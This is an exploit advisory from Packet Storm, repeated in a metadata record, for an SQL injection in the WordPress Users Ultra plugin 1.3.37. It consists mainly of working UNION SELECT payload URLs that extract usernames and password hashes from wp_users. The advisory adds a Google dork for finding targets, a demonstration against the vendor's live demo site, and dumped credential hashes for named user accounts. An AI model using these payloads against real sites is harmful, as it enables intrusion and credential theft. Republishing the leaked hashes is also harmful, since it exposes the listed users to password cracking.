ID PACKETSTORM:128473 Type packetstorm Reporter XroGuE Modified 2014-09-29T00:00:00
Description
`#################################################################################################
# Title : Wordpress Users Ultra Plugin - SQL injection Vulnerability
# Risk : High+/Critical
# Author : XroGuE
# Google Dork : inurl: wp-content/plugins/users-ultra/
# Plugin Version : 1.3.37
# Plugin Name : users ultra
# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip
# Vendor Home : http://www.usersultra.com/
# Date : 2014/09/27
# Tested on : Win7 - Linux
##################################################################################################
# Description:
# This Vulnerability Is Present in Both Versions of This Plugin (Free & Pro Version).
# You Need To Log In As a Member and Send Or Receive a Message To Get A Message ID To Inject Into.
# The Vendor Demo Has This Vulnerability, Check it at This Link: http://usersultra.com/uultra-testing/
#
# PoC :
#
# http://localhost/wp/?page_id=117&module=messages&view=[id]
#
# Proof :
#
# http://www.aparat.com/v/vNI81
# http://www.myblog.att4ck3r.ir/wordpress-users-ultra-plugin-sql-injection-vulnerability/
#
##################################################################################################
#
# Demo :
#
# http://localhost/wp/?page_id=117&module=messages&view=1+and+1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--
# => Users: admin:$P$BsrGHnd./mOlHkK15iHCn81gjJQekC.,test:$P$Bmfp8cwwTYKxKlPQZSJtjVfa4Vw11o1
#
#
# http://usersultra.com/uultra-testing/myaccount/?module=messages&view=63 and 1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--
# => Users: admin:$P$BN.dvG/wrbH1RPFn2DHAkqr6G6NrKs1,franco_zuna:$P$Bakm4N8i/uS/VDjVfQ6oeSYRJWGZ4n.,test:$P$BRraCwdfKm2WGnnukOORsHDhfWmXVv/,adan_brock:$P$BmbyJbV5L8wf.xaRWxHyjAGMz/2UxL.,sean_daze:$P$B0mbw9c/W96/4SlTAkkLGePMqqgZKX1,allnetprovider-z:$P$BuEBNJXebTD3j5gmNqSNsZd8dwQUJb.,Ali28:$P$BeMVJLGapu6EF7FdBtPtKdxGZTKBgl1,Rolan-Deri:$P$Bf/Yt2IEEPxlURhBjPkA3UXyCLIuAX/,louis_h_central_geek:$P$BsYPVcay/T4t4HRSaG0j89mmJPMGjw1
#
##################################################################################################
#
# Discovered By : XroGuE
# Website : http://www.Att4ck3r.ir
# E-Mail : info[at]att4ck3r[Dot]ir
#
##################################################################################################
`
{"id": "PACKETSTORM:128473", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress Users Ultra 1.3.37 SQL Injection", "description": "", "published": "2014-09-29T00:00:00", "modified": "2014-09-29T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/128473/WordPress-Users-Ultra-1.3.37-SQL-Injection.html", "reporter": "XroGuE", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:17:27", "viewCount": 12, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2016-11-03T10:17:27", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:27", "rev": 2}, "vulnersScore": 0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/128473/wpusersultra-sql.txt", "sourceData": "`################################################################################################# \n# Title : Wordpress Users Ultra Plugin - SQL injection Vulnerability \n# Risk : High+/Critical \n# Author : XroGuE \n# Google Dork : inurl: wp-content/plugins/users-ultra/ \n# Plugin Version : 1.3.37 \n# Plugin Name : users ultra \n# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip \n# Vendor Home : http://www.usersultra.com/ \n# Date : 2014/09/27 \n# Tested in : Win7 - Linux \n################################################################################################## \n# Description: \n# This Vulnerability Available in Both Version of This Plugin (Free & Pro Version). \n# You need To Login As member and Send Or Recive a Message To Get A Message ID To Inject it. 
\n# The Vendor Demo Has This Vulnerability,Check it at This Link: http://usersultra.com/uultra-testing/ \n# \n# PoC : \n# \n# http://localhost/wp/?page_id=117&module=messages&view=[id] \n# \n# Proof : \n# \n# http://www.aparat.com/v/vNI81 \n# http://www.myblog.att4ck3r.ir/wordpress-users-ultra-plugin-sql-injection-vulnerability/ \n# \n################################################################################################## \n# \n# Demo : \n# \n# http://localhost/wp/?page_id=117&module=messages&view=1+and+1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users-- \n# => Users: admin:$P$BsrGHnd./mOlHkK15iHCn81gjJQekC.,test:$P$Bmfp8cwwTYKxKlPQZSJtjVfa4Vw11o1 \n# \n# \n# http://usersultra.com/uultra-testing/myaccount/?module=messages&view=63 and 1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users-- \n# => Users: admin:$P$BN.dvG/wrbH1RPFn2DHAkqr6G6NrKs1,franco_zuna:$P$Bakm4N8i/uS/VDjVfQ6oeSYRJWGZ4n.,test:$P$BRraCwdfKm2WGnnukOORsHDhfWmXVv/,adan_brock:$P$BmbyJbV5L8wf.xaRWxHyjAGMz/2UxL.,sean_daze:$P$B0mbw9c/W96/4SlTAkkLGePMqqgZKX1,allnetprovider-z:$P$BuEBNJXebTD3j5gmNqSNsZd8dwQUJb.,Ali28:$P$BeMVJLGapu6EF7FdBtPtKdxGZTKBgl1,Rolan-Deri:$P$Bf/Yt2IEEPxlURhBjPkA3UXyCLIuAX/,louis_h_central_geek:$P$BsYPVcay/T4t4HRSaG0j89mmJPMGjw1 \n# \n################################################################################################## \n# \n# Discovered By : XroGuE \n# Website : http://www.Att4ck3r.ir \n# E-Mail : info[at]att4ck3r[Dot]ir \n# \n################################################################################################## \n`\n", "immutableFields": []}